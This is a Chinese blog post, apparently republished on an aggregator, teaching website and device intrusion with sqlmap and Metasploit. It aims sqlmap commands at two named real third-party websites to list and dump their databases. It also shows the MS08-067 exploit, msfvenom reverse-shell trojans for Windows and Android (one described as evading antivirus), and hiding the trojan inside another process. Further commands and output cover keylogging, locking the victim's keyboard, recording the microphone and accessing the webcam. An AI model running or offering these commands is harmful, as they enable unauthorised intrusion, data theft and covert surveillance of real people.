sqlmap对php登录页面,SQLMAP/Metasploit介绍及PHP网站渗透

news/2024/5/20 4:35:35/文章来源:https://blog.csdn.net/weixin_35825858/article/details/115648761

查找PHP网页:   inurl:php?id=

查询jsp网页:inurl:asp?id=

判断网页的动态还是静态

www.baidu.com------>www.baidu.com/index.html-----没有报错就是静态页面

www.baidu.com/plasp?id=86------>www.baidu.com/plasp?id=86  and 1=1--测试网页是否有注入漏洞

www.baidu.com------》www.baidu.com/index.asp---判断伪静态,改变之后若没有报错,则是asp写的

http://www.xyvending.cn/product/product.php?id=34

sqlmap工具用法

sqlmap -u + php网址

检测是否有注入漏洞

sqlmap -u  http://www.xyvending.cn/product/product.php?id=34

b63d8f894647d642989e5999ceab9200.png

没有not

检查是否是dba的权限

sqlmap -u http://www.xyvending.cn/product/product.php?id=34  --is-dba

列出所有数据库

sqlmap -u www.ggec.com.cn/oneNews.php?id=69  --dbs

查找自己的数据库

sqlmap -u www.ggec.com.cn/oneNews.php?id=69 --current-db

拆解对应数据库,更具表名来查询

sqlmap -u www.ggec.com.cn/oneNews.php?id=69 --tables -D "表名"

cookie注入

sqlmap -u www.ggec.com.cn/oneNews.php --cookie "id=56"  --level 2

二、Metasploit

启动工具:root@kali:~# msfconsole

exploit----漏洞利用工具

payloads------漏洞执行后的代码

msf5 > use exploit/-------调用模块

msf5 > use exploit/windows/smb/----调用windows的模块--用tab键即可列出所有模块

msf5 > use exploit/windows/smb/ms08_067_netapi --------选择的漏洞利用模块

msf5 exploit(windows/smb/ms08_067_netapi) >

msf5 exploit(windows/smb/ms08_067_netapi) > show options-----查看要填写参数

8c8a1a7cbf846f36a6e69b6c87077c55.png

msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.20--设置参数

HOST => 192.168.1.20

32dafcab20a215e61a69f826aca144cd.png

msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp-------执行漏洞完成要执行的程序

payload => windows/meterpreter/reverse_tcp

cc7551fa7222afb0d7372c0978aa6991.png

cc80f1e4a577d8c6ccd0cc993aa99384.png

msf5 exploit(windows/smb/ms08_067_netapi) > exploit---执行攻击

Metasploit之远程控制软件

https://www.cnblogs.com/backlion/p/6000544.html

根据自己的IP生成一个木马程序test.exe

root@kali:~# msfvenom windows/meterpreter/reverse_tcp LHOSH=192.168.1.5 LPORT=55555 -i 6  -f exe -o /root/text.exe-----本机的IP和端口,端口可以随便设置

msfvenom -p  windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai  LHOST=192.168.1.124 LPORT=55555 -i 6 -f exe -o /root/script.exe

msfvenom -p  java/meterpreter/reverse_tcp  LHOST=192.168.1.124 LPORT=55555 x> script_java.jar-----可以免杀,测试通过

将test.exe文件复制出来放到windows靶机上

msf5 > use exploit/multi/handler---------------------------------使用hander模块

msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp---使用这个shellcode程序

msf5 exploit(multi/handler) > set LHOST 192.168.2.5

msf5 exploit(multi/handler) > set LPORT 55555

msf5 exploit(multi/handler) > exploit

9d071e13f6bdf943909a44579fc8deef.png

运行上面命令后,在靶机上双击拷贝的木马文件

木马使用:

meterpreter > background-------将已入侵的会话放在后台运行

msf5 exploit(multi/handler) > sessions  -l-------查询在后台运行的会话

msf5 exploit(multi/handler) > sessions  -i 1 -----恢复会话,“1”是根据查询会话显示的id号

注入进程:木马随时有可能被结束进程,就是木马进程隐藏到靶机正常进程里面

ps  ----------------------得到我们要注入的PID进程

migrate -------------------进程PID  注入对应的进程

3280  3248  explorer.exe-----这个进程是windows的桌面进程

meterpreter > migrate 3280

[*] Migrating from 4088 to 3280...

[*] Migration completed successfully.

meterpreter > run vnc----------------------------------远程桌面

文件管理功能

download-----------------------------------下载文件

edit--------------------------------------------编辑文件

cat---------------------------------------------查看文件

mkdir------------------------------------------创建文件夹

mv---------------------------------------------移动文件

rm----------------------------------------------删除文件

upload----------------------------------------上传文件

rmdir-------------------------------------------删除文件夹

调用摄像头操作

enumdesktops---------------------------------用户登陆数

keyscan_dump --------------------------------键盘记录---下载

keyscan_start  ---------------------------------键盘记录-开始

keyscan_stop-----------------------------------键盘记录-停止

uictl------------------------------------------------获取键盘鼠标控制权

record_mic --------------------------------------音频录制

webcam_chat -----------------------------------摄像头接口

webcam_list  ------------------------------------查看摄像头列表

webcam_stream--------------------------------摄像头视屏获取

getsystem----------------------------------------获取高权限

meterpreter > enumdesktops

Enumerating all accessible desktops

Desktops

========

Session  Station               Name

-------  -------               ----

18       WinSta0               sbox_alternate_desktop_local_winstation_0x29BC

18       WinSta0               Default

18       Service-0x0-704d214$  sbox_alternate_desktop_0x29BC

meterpreter > keyscan_start

Starting the keystroke sniffer ...

meterpreter > keyscan_dump

Dumping captured keystrokes...

cdshiceshi jianpan jilu

meterpreter > keyscan_stop

Stopping the keystroke sniffer..

meterpreter > uictl -h

Usage: uictl [enable/disable] [keyboard/mouse/all]

meterpreter > uictl disable keyboard-----锁定键盘

Disabling keyboard...

meterpreter > uictl enable keyboard------解锁键盘

Enabling keyboard...

meterpreter > record_mic -d 10

[*] Starting...

[*] Stopped

Audio saved to: /root/jVFmVLmc.wav

root@kali:~# apt-get install mplayer-------------kali上听音乐看视频的安装包

渗透安卓系统

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set PAYLOAD android/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.1.5

msf5 exploit(multi/handler) > set LPORT55555root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOSH=192.168.1.5 LPORT=55555 R > /root/test1.apk---生成木马程序

将生成的木马传到手机

msf5 exploit(multi/handler) > exploitsearch-------------------------------搜索文件 类似gpg

download----------------------------下载文件

f4866c6a4d02b5cf6cda92e7621b65be.png

0b4a715aa697461eb0a1e0b538432bd1.png

002616b39d86570e18c94c5f28732b37.png

f1098f04305e38871268b17ff6f56310.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.luyixian.cn/news_show_829503.aspx

如若内容造成侵权/违法违规/事实不符,请联系dt猫网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

php新闻添加图片,开发企业网站12 -- 新闻添加(带图片上传)

php新闻添加图片,开发企业网站12 -- 新闻添加(带图片上传)

require_once(init.php);if(!empty($_POST)){//这里接收news_add.php传过来的数据$data $_POST;//这个值有默认值,所以判断一下//传值就使用传过来的值,空值就使用默认值0$data[sort] !empty($_POST[sort])?intval($_POST[sort]):0;//修改功能&#x…
阅读更多...
web浏览器与网站服务器,web服务器和web浏览器

web浏览器与网站服务器,web服务器和web浏览器

web服务器和web浏览器 内容精选换一换当您需要实现网站HTTPS化,并监控HTTPS业务流量,识别并阻断SQL注入、CC攻击等攻击,保护Web服务安全稳定时,本文档指导您如何实现网站HTTPS化并对HTTPS业务流量进行监控。假设您有一个网站&…
阅读更多...
匿名用户访问用发布站点模板创建网站的列表项时要求登录的问题解决

匿名用户访问用发布站点模板创建网站的列表项时要求登录的问题解决

因为发布站点中的一个Feature被打开了,造成将列表FormPage的查看给Lock了,所以需要登录,将其关闭就OK了。哈哈。英文KB:Users are unexpectedly prompted to enter their credentials when they access a list in a Windows Share…
阅读更多...
如何部署互动百科的开源wiki建站系统

如何部署互动百科的开源wiki建站系统

最近想在技术部门内部搭建一个知识共享平台,经过一番了解和相关资料的查阅,选定了互动百科的开源wiki系统。选定互动wiki(下文简称hdwiki),主要的原因有如下几个方面: 1.中文版。这样对于我个人或者团队内部成员而言&a…
阅读更多...
大型高性能网站的十项规则,互联网营销

大型高性能网站的十项规则,互联网营销

在我们公司ChinaNetCloud,见过多种不同类型的网站和系统,有好也有差。其中有些系统拥有良好的服务器/网络架构,并且进行了合理的调整和监控;然而一般的系统都会有安全和性能上的问题,不能良好运行,也无法变…
阅读更多...
Jupiter:微软的下一代统一开发平台?,徐汇区网站设计

Jupiter:微软的下一代统一开发平台?,徐汇区网站设计

Silverlight真的完了么?未来在Windows 8和Windows phone中抉择吗?这是一个萦绕在Windows开发者脑海的问题,曾经Silverlight是解决开发者们跨平台跨浏览器兼容性的钥匙,后来又有了Javascript和HTML5来创建Windows 8上面的应用&…
阅读更多...
Java.net网站新改版上线

Java.net网站新改版上线

Java.net 网站在今年2月25日时关闭进行升级,现在已经升级完毕(不知道什么升级需要这么长时间)。新版本更新编辑网页、博客、wikis和改组后的论坛。原文链接:http://www.oschina.net/news/15947/javanet-gets-some-new-jolt转载于:…
阅读更多...
16个精美的 HTML5 作品集网站设计案例

16个精美的 HTML5 作品集网站设计案例

今天分享的作品集网站有些特别,因为他们都是使用 HTML5 制作的。对于设计师来说,为了吸引注意力,作品集必须展示出你的能力,这有点像制作简历,要让人们看到你所擅长的,突出的部分,这是一次推销自…
阅读更多...
转载——网站重构的8点建议

转载——网站重构的8点建议

1.用局部变量替换多次使用的对象 比如我们在一段代码内,多次使用document、window这样的对象,我们可以用局部变量替换他们。 var d document,w window; 原理:访问直接量和局部变量的速度快,相反,访问数组元素和对象成…
阅读更多...
ASP.NET 2.0中轻松实现网站换肤

ASP.NET 2.0中轻松实现网站换肤

一、简介:利用Themes我们可以很容易的更改控件、页面的风格,而不需要修改我们的代码和页面文件。Themes文件被单独的放在1个App_Themes文件夹下面,与你的程序是完全分开的。二、怎么使用Themes和Skins:  先看个非常简单的实例&a…
阅读更多...
Python 使用 scrapy shell 网站 进入命令窗口时候报错 AttributeError: module ‘lib‘ has no attribute

Python 使用 scrapy shell 网站 进入命令窗口时候报错 AttributeError: module ‘lib‘ has no attribute

Python 使用 scrapy shell 网站 进入命令窗口时候报错 问题描述——AttributeError: module ‘lib’ has no attribute ‘X509_V_FLAG_CB_ISSUER_CHECK’‘action’ 不是内部或外部命令,也不是可运行的程序或批处理文件。 问题原因 错误分析:主要原因是…
阅读更多...
想要好看的壁纸图片,用这个网站一键解决,不用爬虫也能实现爬虫效果,一键爬取图片网站所有的图片

想要好看的壁纸图片,用这个网站一键解决,不用爬虫也能实现爬虫效果,一键爬取图片网站所有的图片

想要好看的壁纸图片,用这个网站一键解决,不用爬虫也能实现爬虫效果,一键爬取图片网站所有的图片 网站的地址 https://extract.pics/演示例子: 图片网站 https://www.sohu.com/a/582693827_121123945演示:
阅读更多...
视频工作者应该知道的几个网站

视频工作者应该知道的几个网站

2019独角兽企业重金招聘Python工程师标准>>> 视频质量评价: MSU Video Quality Measurement Tool: MSU Video Quality Measurement Tool(msu vqmt)是一种客观视频质量评价程序。它提供了多种全参考视频质量评价方法&am…
阅读更多...
在网站内建立地图(百度地图)

在网站内建立地图(百度地图)

有时候网站会标注公司的地理位置&#xff0c;为了更直观的体现地理位置&#xff0c;一般会在网站内部嵌入地图。如下图例子&#xff1a; 完整html代码如下&#xff1a; <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org…
阅读更多...
利用Metaweblog技术的API接口同步到多个博客网站(详细)

利用Metaweblog技术的API接口同步到多个博客网站(详细)

很早就有这个想法&#xff1a;自己有时候会用到多个博客&#xff0c;有些博客在一个网站上写完之后&#xff0c;要同步到其他博客网站&#xff0c;自己只能复制粘贴&#xff0c;感觉特别没意思&#xff0c;复制粘贴的麻木了。一直在想有哪些技术能实现一次写博&#xff0c;多站…
阅读更多...
IT开发常见网站整理-ing

IT开发常见网站整理-ing

1、http://www.stylusstudio.com/Stylus Studio是一款非常不错的XML编辑器&#xff0c;使用Stylus Studio可以帮助用户设计和导出XML项目的IDE环境&#xff0c;支持语法高亮&#xff0c;XPath查询编辑器&#xff0c;文档验证器&#xff0c;拼写检查等XML编辑器StylusStudio XML…
阅读更多...
前端开发学习网站

前端开发学习网站

1、http://www.runoob.com
阅读更多...
用腾讯云搭建自己的个人网站(借助wordpress)

用腾讯云搭建自己的个人网站(借助wordpress)

1、申请一个云服务器 https://console.cloud.tencent.com/cvm/instance/detail?actionDescribeInstanceVncUrl&rid8&idins-amwelbux 2、入门搭建个人博客用wordpress https://cloud.tencent.com/product/cvm/getting-started 三、登录云服务器&#xff1a; https:/…
阅读更多...
通过读取淘宝API的优化 来考虑高并发网站的架构讨论

通过读取淘宝API的优化 来考虑高并发网站的架构讨论

做一个淘宝客网站所需要的API&#xff0c;TOP几乎没有任何权限限制&#xff0c;唯一困扰各位淘客的应该就是流量了。以下详细讲解了四个案例&#xff0c;循序渐进&#xff0c;最终提供一个给各位淘客参考的网站架构&#xff0c;来解决这个流量超限的问题。本文仅针对淘宝客网站…
阅读更多...
好网站记录

好网站记录

http://www.xwood.net/
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023

友情链接: 我的编程经验分享 一条长河网 尧图网站开发 尧图建网站 广利置业